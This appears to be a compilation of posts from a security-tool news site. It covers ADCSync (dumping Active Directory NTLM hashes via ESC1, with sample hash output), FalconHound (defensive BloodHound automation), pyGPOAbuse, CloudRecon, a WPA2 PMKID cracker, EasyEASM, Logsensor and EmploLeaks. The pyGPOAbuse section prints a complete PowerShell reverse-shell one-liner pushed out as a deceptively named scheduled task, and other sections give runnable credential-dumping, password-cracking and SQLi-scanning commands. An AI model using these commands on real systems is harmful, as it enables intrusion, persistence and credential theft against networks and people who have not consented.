This is a tool I whipped together quickly to DCSync utilizing ESC1. It is quite slow, but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.


This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

Introduction

ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.
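Conceptually, each loop iteration boils down to a pair of Certipy calls like the following (a sketch with illustrative values; exact flags depend on your Certipy version):

certipy req -u 'clu@thegrid.local' -p 'theperfectsystem' -ca THEGRID-KFLYNN-DC-CA -template SmartCard -upn 'shirlee.saraann@thegrid.local' -target-ip 192.168.0.98
certipy auth -pfx shirlee.saraann.pfx -dc-ip 192.168.0.98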

Installation

git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

Usage

To use this tool we need the following things:

  1. Valid Domain Credentials
  2. A user list from a BloodHound dump that will be passed in.
  3. A template vulnerable to ESC1 (found with Certipy find)
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Usage: adcsync.py [OPTIONS]

Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of the target machine [required]
--help Show this message and exit.

TODO

  • Support alternative authentication methods such as NTLM hashes and ccache files
  • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
  • Add jitter and sleep options to avoid detection
  • Add type validation for all variables

Acknowledgements

  • puzzlepeaches: Telling me to hurry up and write this
  • ly4k: For Certipy
  • WazeHell: For the script to set up the vulnerable AD environment used for testing


FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of BloodHound In A More Automated Fashion

By: Zion3R


FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

One of the hardest relationships to gather for BloodHound is local group memberships and session information. As blue teamers, we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.


Other examples where FalconHound can be used:

  • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
  • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
  • Adding CVE information and whether there is a public exploit available to the graph.
  • All kinds of Azure activities.
  • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
  • Adding new users, groups and computers to the graph.
  • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownership of certain entities.

The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

A blog detailing more on why we developed it and some use case examples can be found here

Supported data sources and targets

FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

Currently, FalconHound supports the following data sources and or targets:

  • Azure Sentinel
  • Azure Sentinel Watchlists
  • Splunk
  • Microsoft Defender for Endpoint
  • Neo4j
  • MS Graph API (early stage)
  • CSV files

Additional data sources and targets are planned for the future.

At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


Installation

Since FalconHound is written in Go, no installation is required; just download the binary from the releases section and run it. Compiled binaries are available for Windows, Linux and macOS.

Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to create all credentials can be found here.

The recommended way to run FalconHound is as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.

Requirements

  • BloodHound, or at least the Neo4j database for now.
  • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
  • Credentials for each endpoint you want to talk to, with the required permissions.

Configuration

FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.


Usage

Default run

To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

./falconhound -go

List all enabled actions

To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

./falconhound -actionlist -go

Run with a select set of actions

To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

./falconhound -ids action1,action2,action3 -go

Run with a different config file

By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

./falconhound -go -config /path/to/config.yml

Run with a different actions folder

By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

./falconhound -go -actions-dir /path/to/actions

Run with credentials from a keyvault

By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag, FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault, it will fall back to the config file.

./falconhound -go -keyvault

Actions

Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file, stored in the directory of its query source. The filename is used as the name of the action.

Action folder structure

The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.

Action files

All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.
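As a rough sketch, an action file assembled only from the fields described below might look like this (hypothetical; consult the template file in the root folder for the authoritative schema):

Enabled: true
Debug: false
SourcePlatform: Sentinel
Query: |
  SecurityEvent
  | where EventID == 4624
  | project Computer, TargetUserSid, TimeGenerated
Targets:
  - Name: CSV
    Enabled: true
    Path: output/logons.csv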

While most items will be fairly self-explanatory, there are some important things to note about actions:

Enabled

As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

Enabled: true

Debug

This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.

Debug: false

Query

The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}

Targets

Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.

CSV

  - Name: CSV
Enabled: true
Path: path/to/filename.csv

Neo4j

The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The replacement fields are configured in the Parameters section, as shown below.

  - Name: Neo4j
Enabled: true
Query: |
MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
Parameters:
Computer: Computer
TargetUserSid: TargetUserSid
Timestamp: Timestamp

The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.
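
As a rough illustration of this mechanism (a Python sketch using the neo4j driver; FalconHound itself is written in Go, and the URI, credentials and result row below are placeholders), each result row becomes a parameter map that is bound to the $-variables of the query:

# Sketch: bind one query-result row to the $-parameters of a Cypher query.
from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))

query = (
    "MATCH (x:Computer {name:$Computer}) "
    "MATCH (y:User {objectid:$TargetUserSid}) "
    "MERGE (x)-[r:HasSession]->(y) "
    "SET r.since=$Timestamp SET r.source='falconhound'"
)

# One (hypothetical) row of query results from the source platform.
row = {"Computer": "WS01", "TargetUserSid": "S-1-5-21-1-2-3-1104",
       "Timestamp": "2024-01-27T12:00:00Z"}

with driver.session() as session:
    session.run(query, **row)  # $Computer etc. are taken from the row
driver.close()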

Sentinel

The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

This is also why query output needs to be controlled: you might otherwise flood your target.

  - Name: Sentinel
Enabled: true

Sentinel Watchlists

The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

 - Name: Watchlist
Enabled: true
WatchlistName: FH_MDE_Exploitable_Machines
DisplayName: MDE Exploitable Machines
SearchKey: DeviceName
Overwrite: true

The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

The SearchKey field is the column that will be used as the search key.

The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.

Splunk

Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: Splunk
Enabled: true
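
For intuition, shipping one result row to a HEC endpoint can be sketched as follows (Python with requests; the URL, token and index are placeholders for your own environment, and FalconHound itself does this in Go):

# Sketch: send one query-result row to a Splunk HTTP Event Collector (HEC).
import requests

row = {"EventID": "action1", "Description": "MDE Exploitable Machines",
       "EventData": {"DeviceName": "WS01", "CveID": "CVE-2024-23897"}}

resp = requests.post(
    "https://splunk.example.com:8088/services/collector/event",
    headers={"Authorization": "Splunk 11111111-2222-3333-4444-555555555555"},
    json={"event": row, "index": "falconhound"},
    verify=False,  # lab HEC endpoints often use self-signed certificates
)
resp.raise_for_status()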

Azure Data Explorer

Like Sentinel and Splunk, the ADX target will write the results of the query to an ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: ADX
Enabled: true
Table: "name"

Extensions to the graph

Relationship: HadSession

Once a session has ended, it would normally be removed from the graph, but this felt like a waste of information. So instead of removing the session, it is added as a relationship between the computer and the user. The relationship is called HadSession and has the following properties:

{
"till": "2021-08-31T14:00:00Z",
"source": "falconhound",
"reason": "logoff",
}

This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.

Properties

FalconHound will add the following properties to nodes in the graph:

Computer:
  • 'exploitable': true/false
  • 'exploits': list of CVEs
  • 'exposed': true/false
  • 'ports': list of ports accessible from the internet
  • 'alertids': list of alert ids

Credential management

The currently supported ways of providing FalconHound with credentials are:

  • Via the config.yml file on disk.
  • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
  • Mixed mode.

Config.yml

The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practice is to separate the apps on a per-service level, but you can use one AppID/AppSecret for all Azure-based actions.

The required permissions for your AppID/AppSecret are listed here.

Keyvault

A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on an AppID/AppSecret, which needs to be configured in the config.yml file.

The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role on this Keyvault. This role only allows reading the contents of secrets, not listing them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.

The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.

SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository

Once configured you can add the -keyvault parameter while starting FalconHound.

Mixed mode / fallback

When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.
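
In effect, the lookup order per secret is simply (a pseudocode sketch, not the actual Go source):

# Sketch of the fallback logic in -keyvault mode.
def get_secret(name: str, keyvault: dict, config: dict):
    # Key Vault is the primary source; config.yml is the fallback.
    return keyvault.get(name) or config.get(name)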

Deployment

FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.

All log-based queries are built to run every 15 minutes. Should processing take too long, you might need to tweak this a little; if so, consider disabling certain actions.

There might also be some overlap, for instance with the session actions. If you have a lot of sessions, you might want to disable the session actions for Sentinel and rely on the ones from MDE. This assumes you have MDE and Sentinel connected and most machines are onboarded into MDE.

Sharphound / Azurehound

While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to complement the collection and remove the moment-in-time problem of periodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.

It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.

License

This project is licensed under the BSD3 License - see the LICENSE file for details.

This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.



pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

By: Zion3R


Python partial implementation of SharpGPOAbuse by @pkb1s

This tool can be used when a controlled account can modify an existing GPO that applies to one or more users and computers. It will create an immediate scheduled task as SYSTEM on the remote computer for a computer GPO, or as the logged-in user for a user GPO.

Default behavior adds a local administrator.


How to use

Basic usage

Add user john to the local administrators group (password: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user

Credits



CloudRecon - Finding assets from certificates

By: Zion3R


CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


Install

You must have CGO enabled, and may have to install gcc to run CloudRecon.

sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all, but many still need HTTPS.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (e.g. cloud providers' IPs) and find these hidden gems for testers, by inspecting those SSL certificates.

The tool suite is three parts in GO:

Scrape - A LIVE running tool to inspect the ranges for a keyword in SSL certs' CN and SAN fields in real time.

Store - a tool to retrieve IPs' certs and save all their Orgs, CNs, and SANs, so you can have your OWN crt.sh-style database.

Retr - a tool to parse and search through the downloaded certs for keywords.
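
The core idea behind all three is simple: connect to an IP, pull the certificate, and read the names out of it. A minimal Python sketch of that idea (CloudRecon itself is Go; this assumes the third-party cryptography package, and the IP at the bottom is a placeholder):

# Sketch: grab a host's TLS certificate and print its CN and SANs.
import socket
import ssl

from cryptography import x509
from cryptography.x509.oid import NameOID

def cert_names(ip: str, port: int = 443, timeout: float = 4.0):
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # we connect by IP, not hostname
    ctx.verify_mode = ssl.CERT_NONE  # self-signed/dev certs are the point
    with socket.create_connection((ip, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock) as tls:
            der = tls.getpeercert(binary_form=True)
    cert = x509.load_der_x509_certificate(der)
    cn = [a.value for a in cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)]
    try:
        sans = cert.extensions.get_extension_for_class(
            x509.SubjectAlternativeName).value.get_values_for_type(x509.DNSName)
    except x509.ExtensionNotFound:
        sans = []
    return cn, sans

print(cert_names("1.2.3.4"))  # placeholder IP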

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message

Subcommands:

cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

RETR

retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")


Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, and pmkid must be hex strings, e.g. b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096 iterations, 256-bit output)
  2. PMKID Calculation: PMKID = HMAC-SHA1(PMK, "PMK Name" + bssid + clientmac), truncated to the first 128 bits

This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
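
For reference, the two formulas translate to a few lines of Python (a worked sketch using only the standard library, not the tool's own find_pw_chunk/calculate_pmkid code; MAC addresses are hex strings as in the usage above):

# Sketch: compute a PMKID candidate for one passphrase.
import hashlib
import hmac

def calc_pmkid(passphrase: str, ssid: str, ap_mac: str, client_mac: str) -> str:
    # 1. PMK: PBKDF2-HMAC-SHA1, salt = SSID, 4096 iterations, 32-byte key.
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    # 2. PMKID: first 16 bytes of HMAC-SHA1(PMK, "PMK Name" | AP MAC | client MAC).
    data = b"PMK Name" + bytes.fromhex(ap_mac) + bytes.fromhex(client_mac)
    return hmac.new(pmk, data, hashlib.sha1).hexdigest()[:32]

# A wordlist candidate is correct when its PMKID equals the captured one:
# calc_pmkid("password123", "MyWiFi", "b8621f50edd9", "aabbccddeeff")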

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

You may use Hcxtools or Bettercap to quickly obtain the PMKID without the steps below; the manual way is for understanding.

To obtain the PMKID manually from Wireshark, put your wireless adapter in monitor mode and start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL message 1 of the handshake. Follow the next three steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In the EAPOL 1 packet, expand the IEEE 802.11 QoS Data field to obtain the AP MAC and Client MAC.
  • In the EAPOL 1 packet, expand 802.1X Authentication > WPA Key Data > Tag: Vendor Specific; the PMKID is below it.

If the access point is vulnerable, you should see the PMKID value, as in the screenshot below:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



EasyEASM - Zero-dollar Attack Surface Management Tool

By: Zion3R


Zero-dollar attack surface management tool

featured at Black Hat Arsenal 2023 and Recon Village @ DEF CON 2023.

Description

Easy EASM is just that... the easiest-to-set-up tool to give your organization visibility into its external-facing assets.

The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.

With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.


Installation

go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest

Example config file

The tool expects a configuration file named config.yml to be in the directory you are running from.

Here is example of this yaml file:

# EasyEASM configurations
runConfig:
domains: # List root domains here.
- example.com
- mydomain.com
slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.
discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.
runType: fast # Set to either fast (passive enum) or complete (active enumeration).
activeWordList: subdomainWordlist.txt
activeThreads: 100

Usage

To run the tool, fill out the config file: config.yml. Then, run the easyeasm module:

./easyeasm

After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!
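
The daily diff-and-alert loop the tool performs can be pictured with a toy sketch like this (EasyEASM itself is Go; the file names, CSV layout and webhook URL here are placeholders):

# Toy sketch: diff today's assets against yesterday's and alert on new ones.
import csv
import requests

def assets(path):
    # Assumes the asset name is in the first CSV column.
    with open(path, newline="") as f:
        return {row[0] for row in csv.reader(f) if row}

new = assets("EasyEASM.csv") - assets("EasyEASM.previous.csv")
if new:
    requests.post(
        "https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM",
        json={"text": "New assets found: " + ", ".join(sorted(new))},
    )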

Warranty

The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.

The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.

Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.

By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.

License

This project is licensed under the MIT License - see the LICENSE.md for details.

Contact

For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.



Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning

By: Zion3R


A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning

Features

  • Login panel scanning for multiple hosts
  • Proxy compatibility (http, https)
  • Login panel scanning is done with multiprocessing, so the script is super fast at scanning many URLs (see the toy sketch below)

A quick tutorial & screenshots are shown at the bottom, along with project contribution tips.
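
A toy sketch of that idea (not Logsensor's actual code; it uses threads rather than multiprocessing for brevity, and subdomains.txt is a placeholder host list):

# Toy sketch: fetch many hosts concurrently and flag likely login panels.
import concurrent.futures
import requests

def looks_like_login(url: str) -> bool:
    try:
        html = requests.get(url, timeout=5).text.lower()
    except requests.RequestException:
        return False
    return 'type="password"' in html or "login" in html

urls = [u.strip() for u in open("subdomains.txt") if u.strip()]
with concurrent.futures.ThreadPoolExecutor(max_workers=30) as pool:
    for url, hit in zip(urls, pool.map(looks_like_login, urls)):
        if hit:
            print("[+] possible login panel:", url)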


Installation

git clone https://github.com/Mr-Robert0/Logsensor.git
cd Logsensor && sudo chmod +x logsensor.py install.sh
pip install -r requirements.txt
./install.sh

Dependencies


Quick Tutorial

1. Multiple hosts scanning to detect login panels

  • You can increase the threads (default 30)
  • only run login detector module
python3 logsensor.py -f <subdomains-list> 
python3 logsensor.py -f <subdomains-list> -t 50
python3 logsensor.py -f <subdomains-list> --login

2. Targeted SQLi form scanning

  • provide only a specific login-panel URL with the --sqli or -s flag to run only the SQLi form scanning module
  • turn on the proxy to see the requests
  • customize the username input name of the login panel with its actual name (default "username")
python logsensor.py -u www.example.com/login --sqli 
python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
python logsensor.py -u www.example.com/login -s --inputname email

View help

python logsensor.py --help

usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

optional arguments:
-u , --url Target URL (e.g. http://example.com/ )
-f , --file Select a target hosts list file (e.g. list.txt )
--proxy Proxy (e.g. http://127.0.0.1:8080)
-l, --login run only Login panel Detector Module
-s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
-n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
-t , --threads Number of threads (default 30)
-h, --help Show this help message and exit

Screenshots


Development

TODO

  1. adding "POST form SQLi (time-based) scanning" and checking for delay
  2. fuzzing on URL paths so as not to miss any login panel


EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

By: Zion3R


This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You can easily add your own database and connect to it through the tool.


Installation

